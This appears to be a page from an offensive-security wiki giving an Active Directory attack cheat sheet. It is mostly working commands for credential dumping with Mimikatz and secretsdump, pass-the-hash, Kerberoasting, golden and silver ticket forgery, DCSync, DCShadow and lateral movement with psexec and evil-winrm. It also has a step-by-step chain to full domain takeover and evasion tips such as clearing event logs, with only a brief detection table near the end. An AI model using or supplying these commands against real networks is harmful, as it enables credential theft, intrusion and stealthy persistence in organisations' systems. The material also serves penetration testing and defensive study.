Edit

Active Directory

Active Directory Attacks — Conquering the Domain

Active Directory is the spine of enterprise infrastructure. It stores user accounts, policies, Kerberos tickets, and trust relationships. Mastering AD exploitation means mastering corporate network compromise — privilege escalation, credential abuse, and lateral movement at scale.

I. 🧩 Core Concepts

Term
Description

Domain Controller (DC)

Central AD server managing authentication.

Kerberos

Ticket-based authentication protocol.

LDAP

Directory access protocol for querying user objects.

Trust

Relationship between domains allowing authentication across them.

SAM / NTDS.dit

Files storing hashes and credentials.

Group Policy (GPO)

Configuration management system.

II. ⚙️ Reconnaissance & Enumeration

🧠 Identify Domain Information

whoami /all
ipconfig /all
nltest /dsgetdc:<domain>
net view /domain

🧩 Enumerate Domain Users & Groups

net user /domain
net group "Domain Admins" /domain

⚙️ LDAP Enumeration

ldapsearch -x -H ldap://dc.example.local -D "" -b "dc=example,dc=local"

🧠 Automated Recon

bloodhound-python -u user -p pass -d example.local -c All --zip

Upload to BloodHound GUI → visualize privilege paths.

III. 💣 Credential Harvesting Techniques

⚙️ Mimikatz (on Windows)

privilege::debug
sekurlsa::logonpasswords
lsadump::sam

🧠 Dump LSASS Memory (offline)

procdump64.exe -ma lsass.exe lsass.dmp
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonpasswords"

⚙️ Extract from NTDS.dit

secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL

💣 Pass-the-Hash (PTH)

pth-winexe -U 'Administrator%aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0' //10.0.0.5 cmd

IV. 🧠 Kerberos-Based Attacks

🧩 Kerberoasting

Extract service tickets (TGS) for SPNs, then crack offline.

GetUserSPNs.py example.local/user:pass -outputfile hashes.kerberoast
hashcat -m 13100 hashes.kerberoast rockyou.txt

💣 AS-REP Roasting

Users with Do not require pre-authentication flag set.

GetNPUsers.py example.local/ -usersfile users.txt -format hashcat -outputfile asrep.hash
hashcat -m 18200 asrep.hash rockyou.txt

⚙️ Golden Ticket

Full domain compromise by forging TGT.

mimikatz.exe "kerberos::golden /user:Administrator /domain:example.local /sid:S-1-5-21-111222333 /krbtgt:HASH /ticket:golden.kirbi"

🧠 Silver Ticket

Forged TGS for a specific service.

mimikatz.exe "kerberos::golden /user:svc_admin /domain:example.local /sid:S-1-5-21-111222333 /target:dc.example.local /service:cifs /rc4:HASH"

V. ⚙️ Lateral Movement Techniques

Technique
Tool
Description

PsExec

impacket-psexec

Executes commands via SMB service.

WMI Exec

impacket-wmiexec

Remote command execution over WMI.

SMBExec

impacket-smbexec

Fileless remote shell.

WinRM

evil-winrm

PowerShell-based access for admins.

🧩 Examples

psexec.py [email protected] cmd.exe
wmiexec.py user:[email protected]
evil-winrm -i 10.0.0.5 -u Administrator -p Password123

VI. 🧠 Privilege Escalation within Domain

⚙️ Find Misconfigured Service Accounts

Get-ADUser -Filter * -Properties ServicePrincipalName

💣 Exploit Delegation

  • Unconstrained delegation → steal TGT from memory.

  • Constrained delegation → abuse msDS-AllowedToDelegateTo.

  • Resource-based constrained delegation (RBCD) → control via ACL abuse.

rbcd.py -dc-ip 10.0.0.1 -t victim -f attacker

VII. ⚙️ ACL & GPO Abuse

🧩 Enumerate Privileges

Get-ObjectAcl -DistinguishedName "CN=Domain Admins,CN=Users,DC=example,DC=local"

💣 Modify GPO for Code Execution

powershell -c "New-GPO -Name EvilPolicy"
Set-GPPermission -Name EvilPolicy -PermissionLevel GpoEditDeleteModifySecurity -TargetName 'Domain Users' -TargetType Group

VIII. 🧠 Abusing Trust Relationships

⚙️ Enumerate Trusts

nltest /domain_trusts

💣 SID History Injection

mimikatz "lsadump::trust /patch"

🧠 Cross-Domain Kerberoasting

GetUserSPNs.py child.local/user:pass -dc-ip 10.0.0.1 --request-user [email protected]

IX. ⚙️ Credential Dumping from Workstations

🧩 Registry Hive Extraction

reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
secretsdump.py -sam sam.save -system system.save LOCAL

⚙️ Cached Credentials

mimikatz "lsadump::cache"

X. ⚙️ Pass-the-Ticket (PTT)

Steal valid TGT and reuse it:

mimikatz "sekurlsa::tickets /export"
klist add tgt.kirbi
dir \\dc\C$

Works without knowing the user’s password.

XI. 🧠 DCShadow Attack

Push rogue replication updates directly to AD.

mimikatz "lsadump::dcshadow /object:Administrator /attribute:member /value:CN=eviluser,CN=Users,DC=example,DC=local"

XII. ⚙️ DCSync Attack

Mimic domain replication to extract all hashes.

secretsdump.py example.local/Administrator:[email protected]

or

mimikatz "lsadump::dcsync /domain:example.local /user:krbtgt"

XIII. 💀 Persistence in Active Directory

Method
Description

Golden Ticket

Reuse forged TGT indefinitely.

SID History Injection

Maintain hidden domain admin privileges.

Skeleton Key

Patch LSASS to accept master password.

AdminSDHolder Abuse

Force permissions inheritance every hour.

DCShadow

Re-introduce malicious changes silently.

XIV. ⚙️ Detection Evasion

Operational Security (OPSEC) Tips

  • Avoid noisy enumeration (net group /domain) on sensitive hosts.

  • Use -k (Kerberos auth) instead of NTLM where possible.

  • Clear event logs after exploitation (only in labs/CTFs).

  • Randomize ticket lifetimes and usernames when forging.

XV. ⚙️ AD Exploitation Toolset

Category
Tool
Usage

Recon

BloodHound, SharpHound

Privilege path mapping

Credential Dumping

Mimikatz, secretsdump.py

Hash extraction

Kerberos Abuse

Impacket, Rubeus

Ticket operations

Lateral Movement

PsExec, Evil-WinRM, SMBExec

Remote shells

Persistence

DCShadow, AdminSDHolder

Stealth access

Visualization

BloodHound GUI

Attack path analysis

XVI. ⚔️ Real-World Attack Chain Example

# 1. Enumerate Domain Users
net user /domain

# 2. Kerberoast Service Accounts
GetUserSPNs.py corp.local/user:pass -output hashes.txt

# 3. Crack Hash
hashcat -m 13100 hashes.txt rockyou.txt

# 4. Use Cracked Creds for Lateral Movement
psexec.py [email protected] cmd.exe

# 5. Dump NTDS.dit on Domain Controller
secretsdump.py -just-dc corp.local/[email protected]

# 6. Forge Golden Ticket
mimikatz "kerberos::golden /domain:corp.local /sid:S-1-5-21-1337 /krbtgt:<hash> /user:Administrator"

Result → Full Domain Takeover 🏴‍☠️

XVII. 🧩 Defensive Notes (Blue Team Awareness)

Detection
Indicator

Kerberoasting

Large number of TGS requests.

AS-REP Roasting

Users without pre-auth logging.

Golden Ticket

Anomalous TGT lifetime >10 hours.

DCSync/DCShadow

Replication service started from non-DC host.

AdminSDHolder Abuse

Unexpected ACLs on AdminSDHolder object.

XVIII. ⚙️ Quick Reference Table

Technique
Tool
Command

Kerberoast

Impacket

GetUserSPNs.py

AS-REP Roast

Impacket

GetNPUsers.py

Pass-the-Hash

Impacket

psexec.py

Pass-the-Ticket

Mimikatz

kerberos::ptt

DCSync

Mimikatz / Impacket

lsadump::dcsync

ACL Abuse

PowerView

Get-ObjectAcl

Persistence

Mimikatz

lsadump::dcshadow

PreviousReverse Shell ArsenalNextForensics

Last updated

Was this helpful?